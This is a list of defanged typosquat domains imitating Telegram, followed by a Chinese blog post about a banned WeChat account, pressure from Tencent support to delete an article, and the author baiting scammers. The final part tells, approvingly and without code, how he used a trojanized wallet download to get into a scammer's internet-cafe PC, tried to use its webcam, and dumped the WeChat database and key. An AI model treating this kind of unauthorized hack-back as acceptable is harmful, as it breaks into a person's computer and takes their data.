telagrem-zn[.]com
www[.]telegham[.]com
www[.]telegdn[.]com
www[.]telegrfm[.]com
www[.]telegnm[.]com
www[.]telegrames[.]org
u5x9ckzpj7910225[.]gettelegram[.]xyz
f953b4a29c6253a0b43ca25601710c32[.]oss-accelerate[.]aliyuncs[.]com
telgram[.]cn
tgdowm[.]com
app[.]telegranyy[.]com
8qw2hl54c9p105654[.]telegramwindows[.]xyz
telegram[.]gs
telegpn[.]com
downs[.]telcp213[.]com
www[.]teleggam[.]com
www[.]telegramdh[.]com
telegqn[.]com
www[.]telegram[.]farm
telegrcn[.]org
www[.]telelgracn[.]com
www[.]telegkam[.]com
www[.]skypocn[.]com
telegrjm[.]com
wwv[.]telegramdm[.]com
www[.]telegrann[.]org
www[.]telegram-c[.]com
www[.]telegramstr[.]com
telegbam[.]com
aptne[.]com
telegrlm[.]com
telegram-install[.]com
tlegrem[.]com
www[.]telegranak[.]com
www[.]telegxn[.]com
www[.]telegcsm[.]com
www[.]telegpam[.]com
telegtrm[.]com
telegrtm[.]com
www[.]telepang[.]com
www[.]telegracn[.]org
ttelgram[.]com
telegrn[.]com
ww[.]telegwm[.]com
telegram-v7[.]oss-cn-hongkong[.]aliyuncs[.]com
telegwn[.]com
www[.]telegbm[.]com
wwv[.]telegrfm[.]com
www[.]telegrarnm[.]org
www[.]telegramae[.]com
chinesetelecn[.]vip
teleglon[.]com
www[.]telegrambu[.]com
tgsgp[.]oss-accelerate[.]aliyuncs[.]com
www[.]telegrantn[.]com
www[.]chinesetelecn[.]vip
www[.]potacn[.]com
www[.]telegramm[.]cloud
teletgarm[.]com
telegram-chian[.]org[.]cn
telegrammacos[.]org
zh-cn-channel[.]telagarm[.]com
telegarnm[.]com
teiegrcm[.]com
telegramrn[.]com
teleglam-cn[.]com
www[.]telegrampx[.]com
www[.]telecgram[.]org
www[.]telegramcl[.]com
www[.]teleylc[.]com
3s3wy68jxy311850[.]telegramlinux[.]xyz
telegpam[.]com
gettelegram[.]org
telegramde[.]com
telegrab[.]org
www[.]telegram-china[.]org
www[.]telegrhm[.]com
www[.]telegramcq[.]org
www[.]telegramdi[.]com
www[.]telepve[.]com
cn-teleglam[.]com
telegran[.]one
www[.]telegtcn[.]com
www[.]skypebee[.]com
telegvm[.]com
www[.]telegramau[.]com
telegram-w1[.]oss-cn-hongkong[.]aliyuncs[.]com
www[.]telegramga[.]com
www[.]telegrambx[.]com
telegram2[.]com
telegramapp[.]cn
telecnsr[.]com
telegramsku[.]com
www[.]telcp[.]com
chip-usa[.]com
www[.]telegrancf[.]com
www[.]teleghn[.]com
www[.]telgcn[.]com
download81[.]srdna[.]com
www[.]telezj[.]com
telegrammessenger[.]cn
telergems[.]com
www[.]harleyfanzone[.]com
jjkmxv[.]com
www[.]telegramdj[.]com
383f66e5f63bef91845f5a4e22ae5be5[.]oss-accelerate[.]aliyuncs[.]com
telegramapp[.]pro
telegramam[.]org
www[.]telegrammc[.]com
www[.]telegramim[.]org
telegfn[.]com
telegzm[.]com
telegrnam[.]com
telegram-24[.]com
www[.]telegdam[.]com
telegramwindows[.]org
www[.]telegramos[.]org
www[.]telegramapp[.]vip
telegrannn[.]com
www[.]telegramracn[.]org
tgcn[.]top
www[.]telegranhk[.]com
www[.]telegraema[.]com
telegram[.]965rock[.]com
telegram[.]wpcoder[.]cn
www[.]telegmramcn[.]com
www[.]cntegrom[.]com
27[.]124[.]46[.]23
www[.]telegramcj[.]com
www[.]telegvam[.]org
tgramarn[.]com
telegrammacos[.]com
www[.]telegramv[.]com
telegrambt[.]com
telegramwindows[.]com
telegrambq[.]com
www[.]telegfam[.]com
telegranzh[.]com
www[.]telegdm[.]com
www[.]telegramaz[.]com
telegram-china[.]org
telegramgg[.]com
www[.]telegvam[.]com
88smgmt1zh2105738[.]telegramwindows[.]xyz
www[.]telegram-zw[.]com
www[.]telegramgh[.]com
www[.]telegramgi[.]com
www[.]telegrampv[.]com
www[.]telegmn[.]com
telegramapp[.]io
www[.]fj-telegram[.]com
x1eq1kyc5k10454[.]telegramwindows[.]xyz
telegramav[.]com
www[.]telegramnc[.]com
www[.]telegron[.]com
www[.]telegram-fj[.]com
download[.]telegramm[.]wang
telegrems[.]wixsite[.]com
telemetr[.]io
app[.]cntanghuang[.]com
telegramcp[.]com
x-telegram[.]app
telegramab[.]com
telegramct[.]com
sipins[.]com
tleamsc[.]com
tgcn[.]cash
app[.]telegramam[.]org
telegram-fj[.]com
wwv[.]telegranyy[.]com
telegramorg[.]cn
www[.]telegramtk[.]com
telogarm[.]cc
qqjiik1slv8105558[.]telegrammacos[.]xyz
teleggam[.]com
4tewded[.]oss-cn-hongkong[.]aliyuncs[.]com
telegkm[.]com
telegramapp[.]tv
www[.]telegramdg[.]com
www[.]telegramgb[.]com
www[.]telesun[.]org
www[.]telegramml[.]com

----------------劝退线----------------

纯纯原文重发，没有任何新增技术细节之类的信息。

-----------------劝退线------------------

Hi all，吃了没。

上一篇文章要被删除了，不是腾讯要把它河蟹掉，是我自己将把它删除，就在今天的7点30分。

一句话概括删帖原因：我认可腾讯客服联系到我进行解释后的部分说法，且出于人道主义不想给同为打工人的两位客服添麻烦。

周五下午腾讯客服联系到我之后，向我解释了几个问题，并且提到我的文中有多处描述失实、涉及伤害腾讯客服形象的地方。我考虑之后感觉前文中描述的部分内容确实存在造成误解的可能性，认为有必要澄清一下，遂在这里特地为之前文中我鹅客服相关的问题做一些说明，并把之前的文章改了重发。

这本来就是个吃瓜爽文，没什么技术含量，奈何写的臭还长，占用大家太多时间了。说这是小学生流水账我完全理解，毕竟按照一般的安全媒体文章的节奏来说，花大把时间看我这篇烂梗小说几乎没什么ROI可言。

先说误解

不耽误大家时间，这回不啰嗦了我提炼一下，昨天腾讯客服向我表述的几个误解点在这里澄清。此处我的原则是：虽然有些争议点我有我的道理，但是只要你说的有一定道理，我就认可。

再讲讲过程

你们一般人没有被腾讯客服追着打电话的经历吧，嗨嗨，哥们我昨天就被追着打了。

我能接受的方案不被认可，那我就听你们的，不过我要整个新活。

可以理解为简单的公关解读，前前后后电话打了一个多小时，就不写太全了，也没什么恶意，虽然还是流水账，我主要讲点我觉得有意思的地方。

我

1. 文章能发出来且能一直活着，说明你不是那种别人说点啥你就直接删帖的坏🐧，感谢你愿意接纳批评和指责的声音，我的🐧。

2. 客服一共打了5次电话，前两次在12:06和12:08，感觉应该是是考虑到了工作日的休息时间，但是我忙于干饭没接到。感谢为我着想，我的🐧。

3. 比较有意思的是我后来注意到，两个未接来电是我的两个手机号，虽然两个手机号微信里面都有用过，但是微信只能绑定一个手机号。just职业原因敏感一下，只说现象不说结论。

客服妹子

1. 开始沟通后确认我的身份，定位到了具体微博账号和私信、公众号文章、电话次数等等，听得出来把我这件事当成了单独的case，做了很多的准备。

2. 然后妹子说花了半小时通读了一遍我的文章，然后介绍了一遍文章大体架构和情节，证明确实是做足了准备工作来的。当时我就有点乐了，北京海淀的一只蝴蝶扇动翅膀，彼岸的深圳南山就下起了一场雨，没想到💩文写的这么长连带着客服一起祸害😂，可见了解对手很下功夫。

3. 其次就是一通正向的赞扬了，讲文章有逻辑、理解你号被封的悲愤、看你文章你也是个好人之类的，不展开赘述了。不知道是公司统一培训的还是妹子的个人能力，也不知道妹子那边是否有跟我文中一样的手写剧本，这种先赞同、表扬、欣赏的起手势确实是谈判当中非常重要且常用的技巧。

    说到客服体验很不好什么的，说要回去查一下然后再对客服进行培训xxx，我大概意思是我也非常理解你们，毕竟这么多用户，我不想看到谁被处罚，事情都过去了我也消气了。

4. 此时我嗅到了一股熟悉的气息，就像我准备写超长💩文，我感觉根据她这前摇时间来看，这谈话是真要奔着40分钟去。所以我就直接问她所以你的诉求是什么？是让我删除文章么？

    妹子施法被打断，阵脚修复只用了1.5秒，她说 “删文章只是我们的一个步骤嘛，先听我说完”，我内心OS：删文章都还只是其中一步，还有啥啊....

5. 赞扬完了基本就是转折了，概括性的说，例如 “你有没有想过xxx可能会造成xxxx”、“其实xxx是存在误会的”这种。

6. 转折完了基本就是开始表达她的论点以及阐述她的论据了，几条下来说的很有条理，显然是U Bear Alive 有备而来。关于文章描述不实的，上面解释到的就不说了，我认为客观有道理的观点都表示理解，但是也有几个观点不认可，简单说说。

. 客服妹子在微信上的微博客服给我发了截图，证明微博上确实联系我了，说客服联系我之后，我没有回复有效信息，过了一会发了个hello，然后就再没理会他们。

我整一个大震惊，火速打开微博，发现在 “未关注人消息” 里面确实有客服的消息，但是只有后两条，而且这两条也是刚刚看到，封号事件之后基本就再没点击过这里。

比较败好感的是我截图了只有后两条的对话框她不太相信我的说法，可能怀疑我手动删除了单条消息什么的，她问我那你发的hello咋不见了（我发hello是当时没收到消息，试试看能不能调出来自动回复菜单之类的东西）。

我说可能是当时hello没有回应被我把会话左滑掉了，其次当时还没有跟真正的人工建立联系，有机会跟人工聊天我为啥要不回应呢？再就是下午七点半我都已经在电话里跟客服建立联系了，都已经绝望过了，还有啥理由再来微博这看呢（未关注人消息貌似提醒都不提醒）。

可惜没当时没有刚好那个时间点的对话框截图，只找到一张18分没有收到消息的截图。不过信不信也无所谓了，微博真的吞消息也好，我自己眼睛不好没看见也罢，总之不是客服的锅，他们不至于做个图来哄我。

8. 微博问题俩人辩论了半天没有结论，暂时搁置这个问题继续主线谈判进程，客服妹子说你被封号是因为你转发了没打码的东西，你想想你转发出去的东西还带有你们的成功案例，万一群里的人也想操作然后上当了咋整呢，这不跟你反诈的初衷背道而驰了么。

    实际上两个群一共9个人，6个是做安全的，六个人恨不得假冒菜鸟驿站那帮人也能打下来好让文章能再长点，另外三个也是IT从业，整天听我讲故事听的耳朵都起茧子了。就算是正面遭遇，一般人也骗不了他们....

9. 妹子说我看完之后觉得你这个写的过于专业了，你这个文章如果被骗子看到，会让他们学去的，这不跟你行侠仗义的初衷背离了么。我：emmm不用捧得这么高，那公安部网安局整天发反诈案例跟提醒，人家的剧本不比我的好。

    捧人这种手法比较常见，接受了对手给的高尚人设后就会被套在这个壳里，就不会做出与这个人设不符的事了，说白了有点道德绑架的意思。

10. 妹子知道肉鸡，还暗示了违法犯罪相关，我说我被封号的那个群里就有那些单位的朋友，我肯定是确定自己不会被抓才发的文章。

11. 除了XX大的客服、超话的名字，妹子还提到评论区有过激言论。我说这个没问题，但是评论的人也会收到牵连，我就把几个兄弟的评论隐藏掉了。

12. 反正能拆招的拆招，这一通电话打了28分钟，最终我理解我们达成的协议是，公众号文章是可以修改的，我把她描述的几处 “不实信息” 那里的 “否” 都修改成 “是”。我表达的意思是修改我可以接受，删除文章不想删。

13. 这通电话末尾我让她把在意的点、主要诉求，按照优先级排列（公众号能修改的字数有限，我想先帮她改最在乎的地方），总结一下以文字的形式发到我微信，我给你改。妹子迟疑了一下，说电话里说给我行不行，我说太多了我记不住啊，你放心我不会截图你发的内容再来抹黑你或者怎样。她说好的，等会发你。

    这里的反取证意识也是谈判当中相当重要的一个trick，避免对手拿到实质证据，另一方面也避免自己陷入恶意曲解的境地。

14. 一直没有等到她的消息，过了大概两个半小时，又打电话过来，问需要占用10到20分钟可以么，我直接惊呼出口 “为啥还需要这么久？”

    这次她的态度完全变得强硬了，不知道是领导授意还是怎么，闭口不谈之前的优先级需求列表了，转而开始说文章标题也不满意、XX大的客服也不行，还是得删。我开始有点不耐烦了，心想差不多得了，按照我的经历换位思考，我没有任何夸大抹黑，已经答应让步了还想怎样。

    我说那不可能了，我只能接受修改文章，你不满意标题没办法，公众号文章不支持修改标题，除非你能联系公众号的人后台给我开个权限让我修改标题。

15. 这第4通电话没打完，老大喊我上楼处理事情，我就先给挂了，跟她说等会再聊我得工作，挂电话时我问她几点下班，她说一直等到我有时间为止。

    整的我还贼不好意思，说白了我还愿意接着聊的原因在于，她也只是个打工人，我也不想太难为她，为了我这种垃圾case耽误周五下午下班时间太不值了，换作我是她，私下早就开骂了。

客服老哥

等我筋疲力尽的处理完事件回来，怕客服妹子等太久，毕竟已经几个小时了，没顾得上吃饭我就给客服微信号发消息了。没想到对面已然换人，换成了一个老哥。我心说彳亍，你们车轮战是吧，吃饭了的欺负没吃饭的。

1. 老哥称自己是腾讯一个安全（脱敏）相关的项目经理，说把我写的东西也看了一遍。他的主要论点是：我非常理解你写的一切，但是站在你写的东西以后可能会被黑公关利用而吃到必胜客律师函的角度考虑，还是建议你删掉文章。

2. 老哥一开口我能感受到一些的售前气息，鉴于以前在数字对销售的印象基本就是 “坑”，我习惯性的后撤三米听电话。周五的这个点工地上其实人已经不多了，我干脆打开外放听老哥说。

3. 老哥提到自己是协调对接黑灰对抗这些项目的，跟我的工作比较接近，大家相互之间应该比较了解。

    寻找共鸣点，拉近彼此关系。

4. 老哥提到有些人在微博也是发一些主观的感受，但是由于违背事实，被黑公关利用后，腾讯公关打官司的时候被牵连，我们应该认识到这个风险。

    这个风险老哥说了好几遍，我问老哥感觉您话里话外是不就是在暗示，如果我再油盐不进就南山必胜客伺候了，老哥说那肯定不是（跟让客服妹子整理文字版发我一样，我不知道他们是不是怕被我抓到什么搞事hhhh）。

    举例说明，晓之以理，暗示。

5. 老哥说非常理解你写了那么长那么久，还花时间跟小学生斗智斗勇，辛苦写出来发出来展示给亲戚朋友看，让大家看到跟骗子斡旋（他是想表达我这么干很有面儿，有自豪感），现在都已经第二天了，涨粉涨流量也都差不多了，是不是可以删掉了。

     我说你看我一年写一篇，也没开广告打赏啥的，是在乎流量嘛？写这个也就图一乐，不想删只是感觉自己没做错什么。

6. 老哥说客服妹子特意去联系了公众号的人，说文章标题改不了，内容也只能修改20个字符，客服妹子想让你修改的东西20个字符肯定是不够的。

    我说那你们有点得寸进尺了啊，一开始商量好的改文字，后来又这也不满意那也不满意。

7. 老哥基本就是那一个风险+之前客服妹子的笔录来回磨，还提到如果我是在乎浏览量之类的，可以在我删除掉客服部分重发之后，帮我多转载几个群......

    我就这么没吃晚饭听他磨了二十分钟，我说彳亍，我可以删。

那就辛苦金哥跟快手哥陪我再演一遭。

以下是原文的修改版，看过的就不用看啦。

TL;DR

因善意提醒朋友小心诈骗，我的微信账号意外被封。在小红书学到可以去微博 “腾讯客服” 超话发帖的姿势，本想以这种方式来与腾讯人工客服取得联系，不料却遇到两拨打着 “付费解封” 幌子骗钱的骗子，其中一位名号为 “金牌黑客”，本文记录的就是整个故事的前因后果，我与两位高人交流的过程。

第一波骗子 - 水果侠

这冗长的故事要从第一波骗子说起。

缘起菜茑驿站

2023年1月31日早上9点52分，我像往常一样还没下通往工地的地铁，yuxge在群里发了一张短信的截图，短信内容看上去是假冒菜鸟驿站，以送电饭煲的名义诱导用户与骗子建立联系的剧本。

yuxge问这是什么套路，因为之前有了解过一些“低成本商品高价到付”来骗人的故事，我就回答说是不是到付的套路啊。不过顺手小红书搜了下，发现有人发帖说有类似做任务返佣之类的情节设计在里面，我把帖子往群里转发了一下，yuxge说感觉跟帖子中描述的不一样，我说那你验证下试试呢。

后来yuxge真的用支付宝加了骗子，骗子说可以送他一份水果，我马上get到这可能是先给用户一点甜头（比如红包发个十块五块）那种，让他地址写公司（比较模糊的园区地址）发给骗子试试。

yuxge还有尝试举报对方，但是没有成功，我理解应该是缺少实质性的证据。

时间来到了午饭后，yuxge被拉到了一个支付宝群，管理员在里面发了一个软件的下载地址，我们点进去看了下，竟然也为iPhone做了客户端（要信任描述文件），iPhone手机信任描述文件这个操作有些危险，我就劝他这个就别试了，估计群里发言的都是自导自演的托。

竟然来真的

2023年1月31日中午12点38分，骗子真的给yuxge买来了水果，虽然知道是骗子在附近的商家下的单，但是为了避免跟骗子本人接触的可能性，yuxge机智的让外卖小哥把水果放到了快递柜里。外卖小哥走了几分钟后，yuxge才去取水果，担心被猫在一边的骗子噶腰子，他还仔细观察了一下外卖柜附近的人。

不过yuxge跟骗子那儿点的山竹和草莓，可能由于单人投资预算有限，骗子给他买的是草莓和苹果，加起来58块。

此时群里被带起来了一波小高潮，群友们骚动了起来。

职业的原因，平时遇到诈骗相关的故事喜欢转发给亲近的朋友当警示案例，连科普带装B。

我觉得这波薅到骗子水果的操作还挺有意思，就把从早上yuxge发言到中午我啃到苹果的聊天记录和并转发到了两个群里，一个是有4个人的舍友的群，一个是有6个人的同事的群。

毕竟这是让骗子花钱买水果给你吃，夺牛逼啊，谁不想薅到骗子花钱买的水果呢？

2023年1月31日中午13点04分，我转发到第二个群的聊天记录刚刚发送出去，yuxge给我的苹果才啃到一半，我的微信号被秒退出了，提示账号状态异常，要根据提示操作。

牛仔很忙

重生之我是Joker

重新登录之后，微信团队提醒 “组织或参与网络刷单等违规行为”。

结合这高强度的时效性，我马上明白过来，应该是我刚才转发的内容被我鹅流弊的风控识别成诈骗了。

是的，我的号被给yuxge买水果的骗子搞封了。

开始以为只是个警告，按照步骤一直操作，但是点到最后面才发现这是一个封号（封大部分功能）处罚。

并且提示我多次违规，本次升级处罚.......

（之前确实被封过一次，但完全猜不到原因，一觉醒来那种。当时猜测可能是因为转发群里的上海图片的追封，虽然封我时距离我转发图片的时间已经时隔非常久）

填身份证、行业、申请说明、手持身份证自拍、在线签名，经过耻辱感拉满的复审流程，我仍然还认为这完全是一次美丽的错误，信心满满的提交申诉后我还打了会儿球。

2023年1月31日中午13点58分，准备回去继续搬砖的我发现手机收到了 “人工核实违规属实，不予解封。” 的通知，我逐渐开始不理解。

回到公司后的我心情是十分复杂的，毕竟就在刚才，吃到骗子花钱买的水果时，我还在群里风光无限的显摆。

但此时的我却不得不面对 “骗子二次注入把我微信号给我干封了，审核还给我实锤有罪、加重处罚” 这个事实。

会有正义么？

即使已经没有线上申诉的机会（线上申诉只给一次机会，没过的话就只能等自己解封），此时的我仍然认为正义可能会迟到，但肯定不会缺席。

虽然这件事解释起来有点滑稽，我开始尝试寻找人工客服的通道，准备在电话里澄清这一切！

但是我打过一波电话，也许是自己手脚太笨，没能找到人工通道的入口。也许是人工客服太忙了吧，那我再多打几次试试。

把包括DNF客服电话之类的好几个号码都试了一遍，也没能接入人工，按照提示咨询微信号相关事宜，等输完自己被封的账号后，得到的机器人回复只有类似 “您的封号是经过实锤的，请等待到期自动解封” 这种回复。

此时的我开始去互联网寻求帮助，虽然小红书有些帖子说打XXX电话直接忽略提示按0即可接入，但是我试过之后发现也没能打通。

后来我寻找了小程序、公众号等等渠道都没有找到，我一拳打在工地墙上，仰天长啸，“我好笨啊！！” BGM起，雪花飘飘，北风萧萧～～～

忽然，此时我在小红书看到一种令人眼前一亮的姿势，即通过在 “腾讯客服” 这个微博超话发帖，来等待客服来评论区与你私信建立联系。

我马不停蹄的去超话来了一帖，图文并茂，细节描述的相当详尽，自认为给到客服的压力相当大，坐等客服主动来找我。

大概不到十分钟，终于等到了客服在我帖子下面评论，我心想还是PR的压力大啊，我终于通过这种非主流的姿势跟人工客服建立联系了。

但是出于未知的原因，腾讯的人工客服似乎确实私信了我，但我也确确实实的没有收到私信。也许是像我朋友说的微博有时候会丢私信，也许是我自己没有看到，总之没收到怪我自己，不怪客服。

当时没有收到消息的我以为客服根本没有私聊我，而只是在超话下面回复了我的评论。感觉自己像个冤种，并且以为连续被欺骗两次的自己，此时双重愤懑叠加。

入地无门

完全是出于发泄、不信邪的重复拨打腾讯客服电话，重复在电话里进入微信申诉步骤，竟然在第N次的重复时，在提示音的末尾听到了不一样的提示 “人工服务请按0”！

我整一个惊呼，原来努力真的会有收获，古人诚不欺我，妙哉。

但是进入人工客服，我小心谨慎的解释完我的问题后，客服的回复是 “微信号的封禁是人工审核的结果，谁也没办法解封，只能等自动解封”。

都不等我开口接话，客服自顾自说完之后直接就把电话挂掉了。

我整一个愤懑x3，现在的我不仅想为自己找回清白，还想找地方举报客服态度无礼。

但是试了几次都是这种结果，仿佛世界都很忙，就我一个人在闲逛。

忘记是三次还是四次之后，系统提示音又变了，类似 “系统检测到您已经多次拨打，为您接入客服” 之类的，这时接电话的小姐姐感觉说话多了点感情，感觉上像是专门处理疑难杂症的小组长一样的角色。

我感觉上帝还是给我递来了救命稻草，因为重复解释过很多遍，我熟练且从容的向她解释这一些，并且强调我的出发点是警示、提醒朋友们不要上当，另外两个群聊都是四五个熟人的小群（没有造成多大的影响）。

37度的她仍然重复着跟之前一样冰冷的话，我追问她难道以后警示别人不要上当就要被封号么？她的观点是人工封禁的肯定是有理由的。我追问难道人工就不会错么？如果我对人工的处理结果有意见，去哪里反馈和投诉？你把投诉电话给我。她的原话大概是 “我这里就是客服啊”。

我突然意识到 “客服” 这类部门的强悍，就像很少有人能去内审内审，谁又能去投诉专门处理投诉的客服呢？

我的心情经历怒愤、羞愤，到现在只剩悲愤，以及理智崩坏边缘。

我制作了一张超长图，大概就是这荒谬的一切，托朋友转发到群里，来宣告接下来我安详的三天。

上次被封号是封功能，看不到所有群聊的消息。这次可以看到群内的消息，但是没法参与讨论。

一开始有时会忘记自己阶下囚的身份，想插句嘴，顶出来一个大红感叹号时才想起来自己并非自由身。

比较尴尬的是有乙方在群里喊我发言，又不想被他们知道我号被封了，我只能假装高冷。

更尴尬的是后来拍一拍忘了改，我这乙方又拍了拍我，不知道发生了啥的他一阵长久沉默。

第三波骗子 - 金牌黑客

流水账结束，重量级嘉宾出场。

善良的茉莉

正常像微博这种非常用的app我都是关闭所有提醒，但是为了等腾讯客服的一个小红点，那天虔诚的我把微博提醒全部打开了。

有一天我发现锁屏界面有微博的消息，有个叫 “茉俪f” 的人来我以前转发的微博下面评论，她提醒我千万不要被骗，有人冒充腾讯客服。

被我鹅伤害的支离破碎的💔感到一股暖意，我表示感谢。

她让我私聊她，要给我看几张图。

在小红书和超话区置顶也有看到过谨防诈骗的提醒，我心想她应该是教训比较深刻，所以迫切的想挽救几个网友，或者释放一下自己的表达欲之类的，就私聊了她。

她发了几张骗子话术的图片（都是别人传的图），说她昨天被骗了1370，我表示同情，并且好奇骗子是怎么做到的，劝她可以报警试试。

最后我感谢她的提醒，准备结束这段愉快的对话。她话锋一转，说自己的微信号是找 “黑客” 解封的。

聊到这我直接不困了啊。

一番娓娓道来，她说你去手机贴吧搜索 “金牌黑客”，第一个就是他。

纯纯哥谭

我拿电脑一搜，发现看来跟自己预想的差不多，贴吧上已经有人把他骗人的事迹挂出来了，微博账号跟贴吧账号都对得上。

想来估计微博女号也是他的小号，微博上通过套近乎的方式来把受害人转移到贴吧上，换个角色然后骗钱。

https://tieba.baidu.com/p/8233493717

此时我计上心来，老天对我不公，就连你也想踩我一脚？

但是前几天工地比较忙，早出晚归所以一直没有时间动手。我闲暇的时候就在心里建模，设想各种可能性，准备搞一套剧本和基础设施，会会这个金牌黑客。

到了隔天晚上 “茉俪f” 来贴心的问我，“他帮你解封了嘛？”，我担心不在微博打招呼，去贴吧找 “金牌黑客” 的时候过不了验证（就是他联系过谁就只骗谁的钱），就先没有回复她。

<- 支线任务出现 ->

直到周末，一觉醒来的我闲着没事又逛了一下那个超话，别人帖子下面的一条评论引起了我的兴趣。

有人留了一个QQ群号，我有点好奇被封的人难道还有专门的交流群么？

加群之后发现群是禁言的

马上有一个管理员来私聊我，说可以解封微信

我问是怎么实现的，对面号称解封人员的兄弟一顿专业术语像模像样。

此时的我才发现，经历一系列意外后让我介入这些骗局的微博超话，也许并非只是存在偶然出现的小概率陷阱，更可能是一个群狼环伺的黑暗森林！

磨刀霍霍

事不宜迟，周日我终于决定开始着手准备。

既然涉及骗钱，就必然涉及付款，所以我计划搞一个区块链剧本，围绕区块链儿来进行人物建模，当时劲头上来咔咔在笔记本记了一些思路。

账号设定围绕主题，包含IP属地、活跃时区、关注贴吧等等

并且准备了一些比较有冲击力的素材，几组图片虽然是同样的内容，但是边框区域不同，可以造成多次重复截不同区域的假象，增加可信度。

水坑web找了个钱包客户端，弄了个反代替换了下win和mac端的下载地址。

测试了几遍从剧本逻辑到上线什么大问题，也考虑过了万一对面是纯小学生或者真是资深安全从业者的话应该怎么应对。

闪击波兰

正式决定跟 金牌黑客 建立联系前，我特意去微博回复了“茉俪f” ，让一切看起来比较顺畅，也预防金牌黑客问我谁介绍来的之类的验证入口性质的问题。

等了一会儿，可能太晚了金牌黑客没有理我。

贴吧的设定是两个陌生用户交流的时候，如果第一条消息没有得到回复，那么就不算建立关系，不能继续交流。发图片的话需要双方互相关注才可以。

我想我干脆准备几个话术，到时候懒得打字，所以就发了一堆解释背景之类的话，准备抢先解释，取得对话的主动权。

（但是后来发现，百度贴吧有个bug，我在美国时区跟金牌黑客聊时，如果重发了在双方建立关系之前发的消息，那条消息的时间是过去的，位置也不会在新的聊天内容的位置，而是在更上面的过去的内容的位置。）

第二天正在去工地的地铁上收到了金牌黑客的回复，简约而充满牌面儿感：哪位

但是由于中午太忙了（其实我中午忙着收拾QQ群内位天津小伙了，两个故事就分开叙述了），我到了午饭后才回复他。

金牌黑客没有马上回复我，下午戴着AirPods听歌时，手机锁着屏Siri突然逐字念到：“金 牌 黑 客 私 信 了 你”，我整一个虎躯一震，一路小跑打开贴吧。（图不是特别相符，是那个意思）

我诚恳的咨询金牌黑客能否帮我解封，金牌黑客欣然表示可以帮助我，还问我要张微信被封的图片，我去小红书搜了张发给他。

趁机赶紧开始我的人设营造，一句话概括就是号太重要、我不差钱、我是玩儿币的。

金牌黑客说你别急（可能去搜1000u是什么单位去了），交完钱发我资料就能解封。

并且金牌黑客给出了业内统一标准的47分钟，彰显了业务的专业程度。

效率换效率

我问到那我怎么给你钱呢？金哥（后面统一简称金哥）说走平台收款QQ就行。

然后，金哥说了一句特别特别有范儿的话，我当时看到后停顿了一分钟来反复品这句话。

不知道你们15、16年那会儿跟没跟真正的娱乐圈（啥技术都不懂纯付款拉黑的那种）小学生、卡盟、收徒之类的人群打过交道，我觉得这句话真的是特别地道，这金哥是正黄旗老互联网啊。

完事金哥发出了他的收款QQ，说微信暂时收不了款，《收 款 太 多 限 额 了》，说明生意很大。

我也不含糊，作为正星条旗老交易员，我特么可是个USDT王老五啊，我抬手就是两张资产秀肌肉图。

并且直接放话，2000u以内都OK的，只要你办事，哥不差钱。

金哥不想太麻烦，我只能一顿诉苦。

我估计金哥也没PP，不跟他拐弯抹角了，直接下饵。

金哥还是比天津小伙彳亍一些，直接就点开了。

但是我特么一看log是iPhone的UA，难不成今天要空军？

金哥不知道给谁学了点iPhone术语，让我给个苹果🍎的签？

我赶紧说别啊，手机交易很危险的，你堂堂一黑客你用电脑不行么（此时我心里还是幻想着他好歹是坐在电脑前的）。

金哥又使出生意很好战术，我只能假装华人无能狂怒。

给他胡诌点专业术语唬一下

我再次试探顺带激一下金哥，堂堂一个黑客没电脑？你用你的iPhone向赛博世界喊话嘛？

随手又扔出一张资产图，隔空向金哥喊话：“💰就在这里，你到底拿不拿啊？”

金哥开始试探性扯点别的，先稳住我。

我怕他不太懂U是啥，钩咬的不牢，给他科普下。

金哥又试探我一下子，我一看你这不是欲就还推么，我反手一记欲擒故纵。

金哥略急，我安抚一下子。

金哥基本把钩含住了，说要上楼开电脑。

我寻思就算是放学了去网吧开个机子也行啊，等他上楼等了二十多分钟，这B拿手机下了个欧易...

我一看不太行，金哥看上去压根就没有电脑，我索性松下口把线稍微放长一点，同时心里基本已经认定他是个小学、初中生了。

外汇这块我是真不懂

我嘱咐金哥可以提前下载客户端，一方面我可以假装不在线不回他消息，另一方面BTC那客户端确实会同步区块，我剧本也算前后呼应下。

金哥为了缓解一下气氛的尴尬，说 《外 汇 我 真 是 一 点 都 不 懂》。

可以理解，毕竟是专注计算机技术这一块，这种冷门的金融领域不了解也是人之常情。

过了没几分钟，金哥不知道去请教了谁，给我发来个BTC钱包地址，问我能不能转。

我心说这货还行啊，这么快弄了个钱包地址来，假装身在美国已经睡去，只读了前两条消息就没再理他。

第二天中午我联系金哥，我说你这地址不行啊，我前面说了我是U商，你发我个BTC地址干啥。

完事表达了作为金主的不耐烦，看金哥应该是实在没电脑，给他指条明路 —— 不行就去网吧吧。

这会儿能看出来金哥是真想要这钱啊，毕竟平时一单几十块，我这一单开张吃三年。

金哥问我能不能等，先给我打个预防针，叫我别不回消息，七点前肯定联系我。

我心说我得搬砖啊，工地下班哪有这么早，这回终于该有电脑了吧，我紫腚等你。

过了一会儿，金哥再一次辜负了我，这B不知道又是在哪搜的还是请教了谁，给我发来个TRC20地址。

我他🐴一口老血吐出来，你是真不做人啊金哥。我开始直接隔空表示恼怒了。

没交易过的地址会显示地址没激活，我直接截图道德绑架。

那你别骗人

金哥想要我钱啊毕竟，只能由着我（估计金哥看到我的图已经在怀疑教程或者他朋友行不行了）。

金哥说，《那 你 别 骗 人》。

胡萝卜加小棒，金哥再次对我许诺七点。

六点多，金哥让我再发下地址。我装作漫不经心，顺带问点别的拉回一下我们对话的主题，避免金哥察觉我们的重心背离。

金哥终于真的花钱开了台机子，我颤抖着👋打开金哥的session。

金牌黑客，这一刻你终于属于我！

金哥说我这客户端安装不了，我给他推了个真的客户端，跟他说得在云端拉取，你稍微等下。

怕金哥着急，我操作的同时也在看着手机怕错过金哥消息，但是金哥却出奇的稳定话少。

我看金哥屏幕已经在同步区块了，趁机跟他说得花点时间。此时客户端显示距离同步完还需要14周😂。

让金哥去网吧，原计划的首要目的就是看能不能开摄像头拿一张金哥靓照，但是比较操蛋的是这网吧的电脑压根就没有摄像头。

金哥说进度条太慢了，我说一开始慢，你得等会儿。

这玩意确实是先慢后快，刚才是需要同步14个星期，现在变成需要同步3天了。

跟金哥说需要等会儿，金哥倒是耐心了起来，半天没再找我。

确认了网吧机器设备里面确实没有摄像头，我看金哥桌面有个微信，进程里面也确实有wechat，趁着金哥不知道是扣手机还是干啥呢，我赶紧脱个db抓个key

又翻了一通感觉确实没啥东西了，金哥这会儿其实已经价值不大了，我干脆问金哥有没有支付宝，套路个账号还方便搜索下。

金哥还有点不死心，毕竟支付宝的话可能就不是2000U了。

